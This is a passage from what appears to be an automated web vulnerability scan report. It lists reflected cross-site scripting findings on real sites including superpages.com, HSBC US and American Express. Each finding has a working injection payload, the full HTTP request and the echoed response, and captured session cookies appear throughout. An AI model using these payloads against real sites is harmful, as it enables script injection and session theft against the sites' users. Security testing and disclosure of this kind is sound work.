Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_cc=true; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:03:55 GMT
Content-Length: 57628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.524. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /coupons

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b22"-alert(1)-"6172bed7d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons?f3b22"-alert(1)-"6172bed7d5b=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=14A03C36B158EBE2AE84FEB1EA46C2E7; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 74692
Date: Thu, 03 Feb 2011 17:09:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h
...[SNIP]...
//yellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/coupons?f3b22"-alert(1)-"6172bed7d5b=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.525. http://www.superpages.com/inc/social/sln.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/sln.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e04"-alert(1)-"5dda26f052b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomlocal1a%26lbp%3D1%26PGID%3Ddalms102.8089.1296748577335.307646855%26bidType%3DCLIK%26TR%3D1&s=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 404 /inc/social/54e04&quot;-alert(1)-&quot;5dda26f052b
Server: Unspecified
Set-Cookie: JSESSIONID=E867CF351209BE67050698C0585FCB01; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:06:55 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
var hostServ = 'http://www.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://www.superpages.com/inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomloc
...[SNIP]...

4.526. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a was submitted in the REST URL parameter 2. This input was echoed as 4500c<img src=a onerror=alert(1)>46b2d68491a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:45 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:46GMT
Content-Length: 58480
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:46 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a in Y
...[SNIP]...
<h1>Select a State to view Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a Listings </h1>
...[SNIP]...

4.527. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 was submitted in the REST URL parameter 2. This input was echoed as 43ba5"><img src=a onerror=alert(1)>935e0c29137 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:36 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:36GMT
Content-Length: 59492
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:36 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks43ba5"><img Src=a Onerror=alert(1)>935e0c29137 in Yellow Pages by SuperPages">
...[SNIP]...

4.528. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c54"><img src=a onerror=alert(1)>2bfa6c73542 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks?41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:55 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:06:56GMT
Content-Length: 60810
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:56 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks?41c54"><img Src=a Onerror=alert(1)>2bfa6c73542=1 in Yellow Pages by SuperPages">
...[SNIP]...

4.529. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf72b<img src=a onerror=alert(1)>ee7e8ccc6d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks?bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:06 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:06GMT
Content-Length: 59798
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:06 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 i
...[SNIP]...
<h1>Select a State to view Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 Listings </h1>
...[SNIP]...

4.530. http://www.thehealthreport.net/ac-usap.php [sub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thehealthreport.net
Path:   /ac-usap.php

Issue detail

The value of the sub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e765"><script>alert(1)</script>4ba170077e5 was submitted in the sub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ac-usap.php?sub=xyp7e765"><script>alert(1)</script>4ba170077e5 HTTP/1.1
Host: www.thehealthreport.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748883062&k=banks&l=Dallas%2c+TX
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:01 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Connection: keep-alive
Content-Length: 48515

...

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<!-- saved from url=(0034)http://www.channel5healthnews.net/ -->
<H
...[SNIP]...
<A href="http://ziggymedia.go2cloud.org/aff_c?offer_id=6&aff_id=1001&source=xyp7e765"><script>alert(1)</script>4ba170077e5-dp"
target=_blank>
...[SNIP]...

4.531. http://www.us.hsbc.com/1/2/3 [hp_pref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3

Issue detail

The value of the hp_pref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74bf5"%3balert(1)//00c0d1ff9 was submitted in the hp_pref parameter. This input was echoed as 74bf5";alert(1)//00c0d1ff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3?command=makeThisMyHome&hp_pref=r74bf5"%3balert(1)//00c0d1ff9 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:06 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:07 GMT
Vary: User-Agent,Cookie
Content-Length: 5895
Set-Cookie: USIB2G=00005EK9jF4bpOMzFrUSkh3Dd5x:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
<script language="javascript">
       var date = new Date();
       date.setTime(date.getTime()+(365*24*60*60*1000));
       var expires = "; expires="+date.toGMTString();
       document.cookie = "hp_pref"+"="+"r74bf5";alert(1)//00c0d1ff9"+expires+"; path=/";


               window.location="null"
</script>
...[SNIP]...

4.532. http://www.us.hsbc.com/1/2/3/hsbcpremier/apply [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/apply

Issue detail

The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 was submitted in the code parameter. This input was echoed as afe63"style="x:expression(alert(1))"19a95eb25d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /1/2/3/hsbcpremier/apply?code=MEP0002714afe63"style%3d"x%3aexpression(alert(1))"19a95eb25d7 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:39 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:39 GMT
Vary: User-Agent,Cookie
Set-Cookie: USIB2G=0000Dhol7ilZ0q0aTb173umEJKd:14k1jbteq; Path=/
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:38 GMT; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 34486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv
...[SNIP]...
-LEFT: 20px; PADDING-TOP: 4px; font-family: Times New Roman, Arial !important; FONT-WEIGHT: bold;" class="redbox" href="https://www.us.hsbc.com/1/2/3/hsbcpremier/apply/start?custype=no&&code=MEP0002714afe63"style="x:expression(alert(1))"19a95eb25d7">
...[SNIP]...

4.533. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/prom/jan-11

Issue detail

The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f was submitted in the code parameter. This input was echoed as 41ec8"style="x:expression(alert(1))"fd17a07d03f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM000169941ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:10 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:10 GMT
Vary: User-Agent,Cookie
Content-Length: 27260
Set-Cookie: USIB2G=0000NYkxlYtKgvFgWjsyZ7uTMLY:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
<a id="begin_now" href="http://www.us.hsbc.com/1/2/3/hsbcpremier/apply?code=CSM000169941ec8"style="x:expression(alert(1))"fd17a07d03f" title="Begin Now">
...[SNIP]...

4.534. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/prom/jan-11

Issue detail

The value of the code request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7758e"%3balert(1)//c523249deae was submitted in the code parameter. This input was echoed as 7758e";alert(1)//c523249deae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM00016997758e"%3balert(1)//c523249deae&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:11 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:11 GMT
Vary: User-Agent,Cookie
Content-Length: 26880
Set-Cookie: USIB2G=0000JbZ447P9hCR84of1XRxrbLB:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
ars = {
        basePath: "/1/PA_1_083Q9FJ08A002FBP5S00000000/content/usshared/Premier/Promotions/2011/Jan/",
        contactUrl: "https://www.us.hsbc.com/1/2/3/hsbcpremier/prom/contact-us?code=CSM00016997758e";alert(1)//c523249deae&WT.ac=HBUS_CSM00016997758e";alert(1)//c523249deae&HiddenMandatoryFields.ProductionPromotionCode=CSM00016997758e";alert(1)//c523249deae",
           deepLinkID: "",
           xmlPath:"/1/PA_1_083Q9FJ08A002FBP5S000000
...[SNIP]...

4.535. http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/jan-11 [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3/hsbcpremier/prom/jan-11

Issue detail

The value of the code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eae3f'%3balert(1)//f4fc58b391e was submitted in the code parameter. This input was echoed as eae3f';alert(1)//f4fc58b391e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM0001699eae3f'%3balert(1)//f4fc58b391e&WT.ac=HBUS_CSM0001699 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:07:12 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:08:12 GMT
Vary: User-Agent,Cookie
Content-Length: 26880
Set-Cookie: USIB2G=0000bKlIRzRrrCPXuxZazS0H-Ki:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
yes,menubar=yes,resizable=yes,scrollbars=yes,toolbar=yes,width=470,height=570,screenX=0,left=0,screenY=0,top=0";
   window.open( 'https://www.us.hsbc.com/1/2/3/hsbcpremier/prom/contact-us?code=CSM0001699eae3f';alert(1)//f4fc58b391e&WT.ac=HBUS_CSM0001699eae3f';alert(1)//f4fc58b391e&HiddenMandatoryFields.ProductionPromotionCode=CSM0001699eae3f';alert(1)//f4fc58b391e','_blank', features );
}
</script>
...[SNIP]...

4.536. http://www201.americanexpress.com/business-credit-cards/ [inav parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www201.americanexpress.com
Path:   /business-credit-cards/

Issue detail

The value of the inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52396"%3balert(1)//a663c189a2b was submitted in the inav parameter. This input was echoed as 52396";alert(1)//a663c189a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-credit-cards/?inav=footer_small_business_credit_cards52396"%3balert(1)//a663c189a2b HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
